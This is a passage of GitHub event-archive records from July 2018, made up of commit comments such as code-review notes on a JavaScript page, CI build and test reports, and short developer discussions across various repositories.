[Test run failed](http://xamarin-storage/jenkins/xamarin-macios/master/2e2fe9298686fded5ad22d112335d1b52d585b13/36/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n<details>\n<summary>2 tests failed, 0 tests skipped, 223 tests passed.</summary>\n\n## Failed tests\n\n * apitest/Mac Classic/All: TimedOut (Execution timed out after 1200 seconds.)\n * monotouch-test/watchOS - simulator/Debug: Failed\n</details>\n"}},"created_at":"2018-07-31T08:57:20Z"}
{"id":"8042684698","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29900631,"position":null,"line":null,"path":null,"commit_id":"e2ef08de820b72d44de462d2f2d84c4b106d5f20","created_at":"2018-07-31T08:57:24Z","updated_at":"2018-07-31T08:57:24Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-580](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-580).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-580-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T08:57:24Z"}
{"id":"8042685605","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900633,"position":714,"line":714,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:57:34Z","updated_at":"2018-07-31T08:57:34Z","author_association":"NONE","body":"У `textarea` нет аттрибута `type`, убери"}},"created_at":"2018-07-31T08:57:34Z"}
{"id":"8042692837","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29900646,"position":206,"line":159,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-31T08:58:55Z","updated_at":"2018-07-31T08:58:55Z","author_association":"NONE","body":"You have valid concerns here. \r\nMy point is that, the second (to reveal) player will reveal if and only if they win, in which case, they prefer to pay the gas right away rather than pay for a new transaction.\r\nIf the second (to reveal) player will lose, then they will not bother anyway, and the first player will have to send a transaction to say that the second player forfeited, in which case the first player will be ok to pay the gas."}},"created_at":"2018-07-31T08:58:55Z"}
{"id":"8042694395","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900649,"position":723,"line":723,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:59:12Z","updated_at":"2018-07-31T08:59:12Z","author_association":"NONE","body":"Называй переменные так, чтоб было понятно что в них находится, в данном случае `const logoImage`"}},"created_at":"2018-07-31T08:59:12Z"}
{"id":"8042696600","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29900661,"position":null,"line":null,"path":null,"commit_id":"d51c5628bdcbcbfe4372b677707ec49468c6eb00","created_at":"2018-07-31T08:59:37Z","updated_at":"2018-07-31T08:59:37Z","author_association":"CONTRIBUTOR","body":"sdcascf"}},"created_at":"2018-07-31T08:59:37Z"}
{"id":"8042697267","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900662,"position":725,"line":725,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:59:44Z","updated_at":"2018-07-31T08:59:44Z","author_association":"NONE","body":"Не понятно, для чего аттрибут `x`, называй так чтоб было понятно. В данном случае, `imageIndex`"}},"created_at":"2018-07-31T08:59:44Z"}
{"id":"8042699233","type":"CommitCommentEvent","actor":{"login":"hawkeye116477"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29900669,"position":null,"line":null,"path":null,"commit_id":"a06d36576cdc3b65bf5aa61b4fdc7d4685b9fe0d","created_at":"2018-07-31T09:00:05Z","updated_at":"2018-07-31T09:00:05Z","author_association":"CONTRIBUTOR","body":"Ale ta strona nie ma języka polskiego, dlatego usunąłem :smile:"}},"created_at":"2018-07-31T09:00:05Z"}
{"id":"8042700658","type":"CommitCommentEvent","actor":{"login":"inetic"},"repo":{"name":"equalitie/ouinet"},"payload":{"comment":{"id":29900671,"position":11,"line":135,"path":"src/bittorrent/bencoding.cpp","commit_id":"55cabaa8f82cbf6d108e0fc0d602eeec516e726a","created_at":"2018-07-31T09:00:18Z","updated_at":"2018-07-31T09:00:18Z","author_association":"MEMBER","body":"I presume it's in the spec? If so, could you please link to it? Also, if such message is indeed ill-formed by the spec, should we not still try to process it the same way as browsers try their best to parse ill-formed html?"}},"created_at":"2018-07-31T09:00:18Z"}
{"id":"8042703373","type":"CommitCommentEvent","actor":{"login":"19770251"},"repo":{"name":"19770251/green"},"payload":{"comment":{"id":29900681,"position":null,"line":null,"path":null,"commit_id":"4ee9ec45bcc5a1b5020a8cc576981ffe55d8dd7f","created_at":"2018-07-31T09:00:43Z","updated_at":"2018-07-31T09:00:43Z","author_association":"OWNER","body":"I just can't seem to break this"}},"created_at":"2018-07-31T09:00:43Z"}
{"id":"8042704686","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900683,"position":726,"line":726,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:00:57Z","updated_at":"2018-07-31T09:00:57Z","author_association":"NONE","body":"Этот `if` можно сократить до `img.src = x === 1 ? \"In-White-54px-TM.png\" : \"In-2C-54px-TM.png\";`\r\n[Тернарый оператор](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Conditional_Operator)"}},"created_at":"2018-07-31T09:00:57Z"}
{"id":"8042707959","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900686,"position":727,"line":727,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:01:26Z","updated_at":"2018-07-31T09:01:26Z","author_association":"NONE","body":"В скриптах предпочтительно использовать одинарные кавычки (`'`)"}},"created_at":"2018-07-31T09:01:26Z"}
{"id":"8042711379","type":"CommitCommentEvent","actor":{"login":"michaeljclark"},"repo":{"name":"riscv/riscv-qemu"},"payload":{"comment":{"id":29900689,"position":null,"line":null,"path":null,"commit_id":"3a621b6d4f6a26a676bbe3f61e3d41d6371761fb","created_at":"2018-07-31T09:01:57Z","updated_at":"2018-07-31T09:01:57Z","author_association":"COLLABORATOR","body":"@palmer-dabbelt  Can we delete the `hifive1-plloutdiv` branch?\r\n@nategraff-sifive has PRCI emulation changes merged in `qemu-for-upstream` / https://github.com/riscv/riscv-qemu/commit/0b2243570e1c66e6b7721c71e6fabd698caf040a"}},"created_at":"2018-07-31T09:01:57Z"}
{"id":"8042713289","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900692,"position":739,"line":739,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:02:17Z","updated_at":"2018-07-31T09:02:17Z","author_association":"NONE","body":"Так нельзя параметры передавать\r\nТут должно быть `showDivs(n)`"}},"created_at":"2018-07-31T09:02:17Z"}
{"id":"8042716918","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900695,"position":738,"line":738,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:02:55Z","updated_at":"2018-07-31T09:02:55Z","author_association":"NONE","body":"Зачем тебе функция, которая просто вызывает другую функцию?\r\nПросто используй `showDivs()`"}},"created_at":"2018-07-31T09:02:55Z"}
{"id":"8042720470","type":"CommitCommentEvent","actor":{"login":"MihaelaStoica"},"repo":{"name":"serencorbett1/xenadmin"},"payload":{"comment":{"id":29900700,"position":4,"line":37,"path":"XenModel/XenAPI-Extensions/SR.cs","commit_id":"19903be3fd52f8186e5d16c98183ec427643ed9f","created_at":"2018-07-31T09:03:33Z","updated_at":"2018-07-31T09:03:33Z","author_association":"NONE","body":"I don't think this is needed "}},"created_at":"2018-07-31T09:03:33Z"}
{"id":"8042727160","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900714,"position":742,"line":742,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:04:47Z","updated_at":"2018-07-31T09:04:47Z","author_association":"NONE","body":"Называй аргументы, чтоб было понятно для чего они (`n` -- не понятно)"}},"created_at":"2018-07-31T09:04:47Z"}
{"id":"8042728217","type":"CommitCommentEvent","actor":{"login":"MihaelaStoica"},"repo":{"name":"serencorbett1/xenadmin"},"payload":{"comment":{"id":29900718,"position":19,"line":503,"path":"XenModel/XenAPI-Extensions/SR.cs","commit_id":"19903be3fd52f8186e5d16c98183ec427643ed9f","created_at":"2018-07-31T09:04:58Z","updated_at":"2018-07-31T09:04:58Z","author_association":"NONE","body":"We shouldn't commit this, as it was only added for testing, before the server-side is implemented"}},"created_at":"2018-07-31T09:04:58Z"}
{"id":"8042730457","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29900724,"position":null,"line":null,"path":null,"commit_id":"8bfccc05ccd263e24a411c6217f19e23df6caf7c","created_at":"2018-07-31T09:05:23Z","updated_at":"2018-07-31T09:05:23Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2980 of 2997 tests passed, 3 test warnings)\n\nMessages:\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 1 test had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.43%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T09:05:23Z"}
{"id":"8042731526","type":"CommitCommentEvent","actor":{"login":"ianfab"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29900730,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-31T09:05:36Z","updated_at":"2018-07-31T09:05:36Z","author_association":"OWNER","body":"@thaichessswinboard Ah, so you are more talking about practical play. If Stockfish thinks that a position is a draw, it does not really care about simplifying or avoiding simplification, so play might not look very natural from a human point of view. Since that usually does not affect playing strength, changing such behavior does not have a very high priority for me, but it would of course be nice to make it play more naturally without affecting overall performance."}},"created_at":"2018-07-31T09:05:36Z"}
{"id":"8042732775","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900733,"position":744,"line":744,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:05:49Z","updated_at":"2018-07-31T09:05:49Z","author_association":"NONE","body":"Всегда, когда возможно, используй `const`, в данном случае `let` не нужен, так как значение этой переменной не будет меняться."}},"created_at":"2018-07-31T09:05:49Z"}
{"id":"8042733861","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900736,"position":745,"line":745,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:06:01Z","updated_at":"2018-07-31T09:06:01Z","author_association":"NONE","body":"Тут тоже `const`"}},"created_at":"2018-07-31T09:06:01Z"}
{"id":"8042737226","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29900751,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-31T09:06:39Z","updated_at":"2018-07-31T09:06:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:06:39Z"}
{"id":"8042746120","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900758,"position":746,"line":746,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:08:15Z","updated_at":"2018-07-31T09:08:15Z","author_association":"NONE","body":"При проходе через хтмл коллекцию, лучше использовать `[Array.from](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/from)` + `[Array.forEach](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/forEach)`\r\n`Array.from(x).forEach((item) => item.style.display = 'none')`"}},"created_at":"2018-07-31T09:08:15Z"}
{"id":"8042752482","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900767,"position":749,"line":749,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:09:23Z","updated_at":"2018-07-31T09:09:23Z","author_association":"NONE","body":"Аналогично, `forEach()`"}},"created_at":"2018-07-31T09:09:23Z"}
{"id":"8042752876","type":"CommitCommentEvent","actor":{"login":"jduckles"},"repo":{"name":"swcarpentry/website"},"payload":{"comment":{"id":29900768,"position":null,"line":null,"path":null,"commit_id":"2b51a64239b14d56114a537bc6e0e41b4dfe0224","created_at":"2018-07-31T09:09:28Z","updated_at":"2018-07-31T09:09:28Z","author_association":"CONTRIBUTOR","body":"They were done in R, very simply: https://gist.github.com/jduckles/8b28d518ce7b701f51736d39a911be37. The AMY api they're fed from is broken at the moment, I'll investigate then file an issue in AMY."}},"created_at":"2018-07-31T09:09:28Z"}
{"id":"8042756192","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29900769,"position":null,"line":null,"path":null,"commit_id":"a06d36576cdc3b65bf5aa61b4fdc7d4685b9fe0d","created_at":"2018-07-31T09:10:06Z","updated_at":"2018-07-31T09:10:06Z","author_association":"COLLABORATOR","body":"Aha,  tylko jakiś przelicznik na PLN."}},"created_at":"2018-07-31T09:10:06Z"}
{"id":"8042756436","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29900770,"position":null,"line":null,"path":null,"commit_id":"8bfccc05ccd263e24a411c6217f19e23df6caf7c","created_at":"2018-07-31T09:10:09Z","updated_at":"2018-07-31T09:10:09Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T09:10:09Z"}
{"id":"8042758222","type":"CommitCommentEvent","actor":{"login":"florevallatmrf"},"repo":{"name":"Marfeel/prebid-universal-creative"},"payload":{"comment":{"id":29900772,"position":5,"line":54,"path":"src/environment.js","commit_id":"41f6bcbb2ab870cedb874df4d1018d6d50bbe215","created_at":"2018-07-31T09:10:27Z","updated_at":"2018-07-31T09:10:27Z","author_association":"NONE","body":"is this going to impact touch as well ?"}},"created_at":"2018-07-31T09:10:27Z"}
{"id":"8042758257","type":"CommitCommentEvent","actor":{"login":"Simonky16"},"repo":{"name":"bareos/bareos"},"payload":{"comment":{"id":29900773,"position":40,"line":132,"path":"docs/manuals/en/developers/generaldevel.md","commit_id":"40c0e4e179127efcc371c21ebb7de5401b04e588","created_at":"2018-07-31T09:10:28Z","updated_at":"2018-07-31T09:10:28Z","author_association":"NONE","body":"I'm sorry, I don't understand. What should be option three?\r\nAs previously discussed, the former option three became option two and the former option two became the annotations regarding where to find the compiler flags used in production. Are you referring to this?"}},"created_at":"2018-07-31T09:10:28Z"}
{"id":"8042758693","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900775,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:10:33Z","updated_at":"2018-07-31T09:10:33Z","author_association":"MEMBER","body":"Are we sure we need this script? We did already have a system in place, that does this (ask Andy for more details)."}},"created_at":"2018-07-31T09:10:33Z"}
{"id":"8042760382","type":"CommitCommentEvent","actor":{"login":"p0deje"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29900779,"position":6,"line":366,"path":"rb/lib/selenium/webdriver/remote/oss/bridge.rb","commit_id":"a3d2f41cd392c9842e3b37be673ec0e287c58ce8","created_at":"2018-07-31T09:10:51Z","updated_at":"2018-07-31T09:10:51Z","author_association":"MEMBER","body":"@twalpole Yeah, maybe I should yield a 1 element array, what do you think?\r\n\r\n@lmtierney @titusfortner Any thoughts on this?"}},"created_at":"2018-07-31T09:10:51Z"}
{"id":"8042760765","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29900780,"position":null,"line":null,"path":null,"commit_id":"0e45073ce805127a0caf834ef825ad0107b661a1","created_at":"2018-07-31T09:10:56Z","updated_at":"2018-07-31T09:10:56Z","author_association":"NONE","body":"why [0..4] bounds for http://tests.stockfishchess.org/tests/view/5b6012540ebc5902bdb930c7 ?"}},"created_at":"2018-07-31T09:10:56Z"}
{"id":"8042761646","type":"CommitCommentEvent","actor":{"login":"efrj"},"repo":{"name":"efrj/TheGamerList"},"payload":{"comment":{"id":29900781,"position":null,"line":null,"path":null,"commit_id":"01fe498a503621aaf6ea646cc79f3fec6a794634","created_at":"2018-07-31T09:11:05Z","updated_at":"2018-07-31T09:11:05Z","author_association":"OWNER","body":"https://code.tutsplus.com/tutorials/rails-image-upload-using-carrierwave-in-a-rails-app--cms-25183"}},"created_at":"2018-07-31T09:11:05Z"}
{"id":"8042761822","type":"CommitCommentEvent","actor":{"login":"MayusYT"},"repo":{"name":"MayusYT/Crowdwash"},"payload":{"comment":{"id":29900782,"position":null,"line":null,"path":null,"commit_id":"2e5e51cabb55487f20c3e6533d08d1c655d22f84","created_at":"2018-07-31T09:11:08Z","updated_at":"2018-07-31T09:11:08Z","author_association":"OWNER","body":"lol"}},"created_at":"2018-07-31T09:11:08Z"}
{"id":"8042761858","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900783,"position":752,"line":752,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:11:08Z","updated_at":"2018-07-31T09:11:08Z","author_association":"NONE","body":"между операндами должны быть пробелы\r\n`x[slideIndex - 1]`"}},"created_at":"2018-07-31T09:11:08Z"}
{"id":"8042764645","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900788,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T09:11:37Z","updated_at":"2018-07-31T09:11:37Z","author_association":"MEMBER","body":"So not sure if all will (still) work fine now."}},"created_at":"2018-07-31T09:11:37Z"}
{"id":"8042764706","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900789,"position":753,"line":753,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T09:11:38Z","updated_at":"2018-07-31T09:11:38Z","author_association":"NONE","body":"Оператор `=+` старайся не использовать"}},"created_at":"2018-07-31T09:11:38Z"}
{"id":"8042768244","type":"CommitCommentEvent","actor":{"login":"MihaelaStoica"},"repo":{"name":"serencorbett1/xenadmin"},"payload":{"comment":{"id":29900816,"position":5,"line":283,"path":"XenAdmin/Controls/SrPickerItem.cs","commit_id":"19903be3fd52f8186e5d16c98183ec427643ed9f","created_at":"2018-07-31T09:12:16Z","updated_at":"2018-07-31T09:12:16Z","author_association":"NONE","body":"Let's remove the TargetSRHasEnoughFreeSpace property and  use the new method directly. There's no much sense in havin a function that just calls another function"}},"created_at":"2018-07-31T09:12:16Z"}
{"id":"8042772118","type":"CommitCommentEvent","actor":{"login":"rachinin1"},"repo":{"name":"ultrakiwi99/pulstime.ru"},"payload":{"comment":{"id":29900826,"position":null,"line":null,"path":null,"commit_id":"0bbd5be11d173260b7001e9599ebf7c29b0ebfdb","created_at":"2018-07-31T09:12:58Z","updated_at":"2018-07-31T09:12:58Z","author_association":"COLLABORATOR","body":"@ultrakiwi99 быстрый заказ работает корректно и других ошибок вроде тоже как не нашёл"}},"created_at":"2018-07-31T09:12:58Z"}
{"id":"8042773470","type":"CommitCommentEvent","actor":{"login":"sukchai19933"},"repo":{"name":"sukchai19933/opensource.guide"},"payload":{"comment":{"id":29900827,"position":null,"line":null,"path":null,"commit_id":"38ac266088615c967ad94b8df6f5d37497eb4d2c","created_at":"2018-07-31T09:13:14Z","updated_at":"2018-07-31T09:13:14Z","author_association":"OWNER","body":"wallet 13oPwBdsbej2ctfbA4d9fZks1o21XQvKXg"}},"created_at":"2018-07-31T09:13:14Z"}
{"id":"8042778590","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29900833,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-31T09:14:10Z","updated_at":"2018-07-31T09:14:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:14:10Z"}
{"id":"8042781273","type":"CommitCommentEvent","actor":{"login":"shahad12345"},"repo":{"name":"shahad12345/website"},"payload":{"comment":{"id":29900836,"position":null,"line":null,"path":null,"commit_id":"09d511661d7a446d322f0e913c6fa66c15bbcdbb","created_at":"2018-07-31T09:14:37Z","updated_at":"2018-07-31T09:14:37Z","author_association":"OWNER","body":"09d511661d7a446d322f0e913c6fa66c15bbcdbb"}},"created_at":"2018-07-31T09:14:37Z"}
{"id":"8042784987","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29900843,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-31T09:15:17Z","updated_at":"2018-07-31T09:15:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T09:15:17Z"}
{"id":"8042785079","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29900844,"position":null,"line":null,"path":null,"commit_id":"4c51d62b5318d9686058be09f0d710f58d61f917","created_at":"2018-07-31T09:15:18Z","updated_at":"2018-07-31T09:15:18Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - i386-Windows-7-VisualStudio-14: OK (2963 of 2964 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 628\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4c51d62b5318d9686058be09f0d710f58d61f917-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4c51d62b5318d9686058be09f0d710f58d61f917-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T09:15:18Z"}
{"id":"8042785157","type":"CommitCommentEvent","actor":{"login":"Samrg"},"repo":{"name":"puruhirave/DesignPatterns"},"payload":{"comment":{"id":29900846,"position":null,"line":null,"path":null,"commit_id":"9afaf0cb907e494afeda02fd8a9adf05ef824572","created_at":"2018-07-31T09:15:19Z","updated_at":"2018-07-31T09:15:19Z","author_association":"NONE","body":"Why have you used unique pointer? not the shared pointer?"}},"created_at":"2018-07-31T09:15:19Z"}
{"id":"8042785277","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29900848,"position":null,"line":null,"path":null,"commit_id":"a06d36576cdc3b65bf5aa61b4fdc7d4685b9fe0d","created_at":"2018-07-31T09:15:20Z","updated_at":"2018-07-31T09:15:20Z","author_association":"COLLABORATOR","body":"@hawkeye116477  A nie, niby jest polski:\r\n\r\n![image](https://user-images.githubusercontent.com/35370833/43450383-e8927902-94b2-11e8-9d00-f5376af0e151.png) |\r\n--- |\r\n\r\nMają coś popsute na stronie, że nie zawsze włącza się polonizacja albo nie skończona.\r\n"}},"created_at":"2018-07-31T09:15:20Z"}
{"id":"8042787212","type":"CommitCommentEvent","actor":{"login":"monotek"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29900852,"position":13,"line":241,"path":"contrib/packager.io/functions","commit_id":"4a610346ccee0dab0067c40bfdaf22d79da5649b","created_at":"2018-07-31T09:15:41Z","updated_at":"2018-07-31T09:15:41Z","author_association":"MEMBER","body":"i already do in line 231 ;-)"}},"created_at":"2018-07-31T09:15:41Z"}
{"id":"8042796647","type":"CommitCommentEvent","actor":{"login":"fozodavid"},"repo":{"name":"fozodavid/react-webshop"},"payload":{"comment":{"id":29900860,"position":5,"line":1,"path":"src/App.js","commit_id":"dab7ec1d2949cf92fbf38ffb84facb37127bcaae","created_at":"2018-07-31T09:17:25Z","updated_at":"2018-07-31T09:17:25Z","author_association":"OWNER","body":"I used prettier for formatting. The best would be to setup ESLint and prettier together."}},"created_at":"2018-07-31T09:17:25Z"}
